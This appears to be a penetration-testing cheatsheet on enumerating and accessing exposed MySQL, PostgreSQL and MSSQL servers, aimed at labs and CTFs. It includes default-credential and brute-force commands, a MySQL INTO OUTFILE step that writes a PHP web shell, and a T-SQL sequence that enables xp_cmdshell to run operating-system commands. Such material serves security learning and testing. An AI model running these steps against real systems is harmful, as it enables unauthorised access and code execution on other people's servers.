
Database Enumeration

This cheatsheet covers the initial enumeration, default credential testing, and direct interaction with standard relational database management systems (RDBMS) exposed on the network.

MySQL / MariaDB (Port 3306)

MySQL enumeration focuses on extracting server information, identifying empty passwords, and finding unauthorized access vectors.

run safe checks for server info, empty passwords, and basic enumeration

nmap -p 3306 --script mysql-info,mysql-empty-password,mysql-enum 10.10.10.10

attempt to login as root without a password

mysql -h 10.10.10.10 -u root

login with a known password

mysql -h 10.10.10.10 -u username -p

Important

If you gain access to MySQL as root (or any account holding the FILE privilege), immediately check the secure_file_priv variable with SHOW VARIABLES LIKE 'secure_file_priv';. An empty value means no restriction: you can read any file the mysqld OS user can read with LOAD_FILE() and write anywhere that user can write with SELECT ... INTO OUTFILE, which on a host that also serves PHP becomes code execution (e.g. SELECT ... INTO OUTFILE '/var/www/html/shell.php';). A directory path restricts both reads and writes to that directory, and NULL disables file import/export entirely. Note that the written file is owned by the mysqld OS user, so the target directory must be writable by that account.


PostgreSQL (Port 5432)

PostgreSQL is heavily used in enterprise environments. Access is governed by pg_hba.conf, which maps each client address, database and role to an authentication method (peer, md5, scram-sha-256, trust, ...), so a successful connection from the network usually means a host rule was left wider than intended.

basic brute-forcing for default postgres accounts

nmap -p 5432 --script pgsql-brute 10.10.10.10

attempt to connect as the default 'postgres' user

psql -h 10.10.10.10 -U postgres

connect to a specific database

psql -h 10.10.10.10 -U username -d database_name

Efficiency

In real-world scenarios and CTFs, databases are frequently bound strictly to 127.0.0.1 (localhost) to prevent external attacks. If you compromise a web server but Nmap didn't show port 3306/5432 externally, check netstat -tulpn (or ss -tulpn on newer systems) on the compromised host. You will likely need to set up a local port forward (e.g. ssh -L 3306:127.0.0.1:3306 user@target), after which the service appears on 127.0.0.1:3306 on your attacking machine and Nmap or the standard database clients can be pointed at it.
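Once psql connects, the queries below (an added example, not part of the original cheatsheet) answer the questions the section raises: who you are, whether the role is a superuser, and why the server was reachable in the first place. pg_hba_file_rules and the SHOW commands require PostgreSQL 10 or later and superuser (or explicitly granted) rights; the role and database names in the output are whatever the target has.

```sql
-- Added example: post-login PostgreSQL triage from psql.
-- Server version, session user and the address/port we actually landed on.
SELECT version(), current_user, inet_server_addr(), inet_server_port();

-- Is our role a superuser? Superuser is what turns a database foothold into host access.
SELECT rolname, rolsuper, rolcreaterole, rolcreatedb
FROM   pg_roles
WHERE  rolname = current_user;

-- All roles, most privileged first; rolcanlogin tells you which are usable as logins.
SELECT rolname, rolsuper, rolcanlogin
FROM   pg_roles
ORDER  BY rolsuper DESC, rolname;

-- Databases we may move into (equivalent to \l in psql).
SELECT datname FROM pg_database WHERE datallowconn;

-- Why was the service reachable? Look for 'host' rules with a wide address/netmask
-- ('0.0.0.0/0', '::/0') or auth_method = 'trust'. Superuser only, PostgreSQL 10+.
SELECT type, database, user_name, address, netmask, auth_method
FROM   pg_hba_file_rules;

-- '*' means all interfaces; 'localhost' means loopback only (the port-forward case above).
SHOW listen_addresses;
SHOW port;
SHOW hba_file;
SHOW data_directory;
```

A role with rolsuper = t is the finding to report even before any file or command access is attempted; a pg_hba rule of type host with auth_method trust and a broad netmask explains an unauthenticated network login and is itself the misconfiguration.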


MSSQL (Port 1433)

Microsoft SQL Server is common in Windows/Active Directory environments and is tightly integrated with Windows authentication: domain users and groups can be mapped directly to logins, and the service itself often runs as a domain account.

gather version and instance info, check for a blank sa (System Administrator) password, and pull hostname/domain details from the NTLM challenge

nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-ntlm-info 10.10.10.10

check credentials and run a command through xp_cmdshell (NetExec's -x enables xp_cmdshell first if it is off; --local-auth selects SQL Server authentication, which the sa login needs, instead of the default Windows authentication)

nxc mssql 10.10.10.10 -u 'sa' -p 'password' --local-auth -x 'whoami'

Rabbit Hole

Unlike MySQL, MSSQL relies heavily on the xp_cmdshell extended stored procedure for OS-level command execution. If you hold sa (or any sysadmin-role) credentials but cannot execute commands, xp_cmdshell is almost certainly disabled, which is the default. You must re-enable it via SQL before attempting to catch a reverse shell, and because it is an advanced option you have to unlock those first: EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;. Commands then run as the SQL Server service account, not as sa.
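The full sequence, as an added example (not code from the original page): confirm the role, read the current state, enable xp_cmdshell, run a command, and put the settings back afterwards. Run it from any T-SQL client (sqlcmd, mssqlclient.py, nxc -q) as a sysadmin login.

```sql
-- Added example: enabling and using xp_cmdshell as a sysadmin.
-- Who are we, and are we sysadmin? IS_SRVROLEMEMBER returns 1 if yes, 0 if no, NULL if the role is unknown.
SELECT SYSTEM_USER AS login_name,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin,
       @@version AS version;

-- Current state before touching anything. value_in_use = 1 means xp_cmdshell is already on.
SELECT name, value, value_in_use
FROM   sys.configurations
WHERE  name IN ('show advanced options', 'xp_cmdshell');

-- xp_cmdshell is an advanced option, so advanced options must be visible first.
-- Both sp_configure calls need the ALTER SETTINGS permission (sysadmin/serveradmin).
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- Runs in the security context of the SQL Server service account
-- (e.g. NT Service\MSSQLSERVER or a domain account), not as the sa login.
EXEC xp_cmdshell 'whoami';
EXEC xp_cmdshell 'whoami /priv';

-- Restore the original state when finished (reverse order).
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
```

If is_sysadmin comes back 0, sp_configure will fail with permission errors and xp_cmdshell is not your path; the credentials are a foothold into the data, not the host, until a privilege escalation inside SQL Server (impersonation, linked servers, etc.) is found.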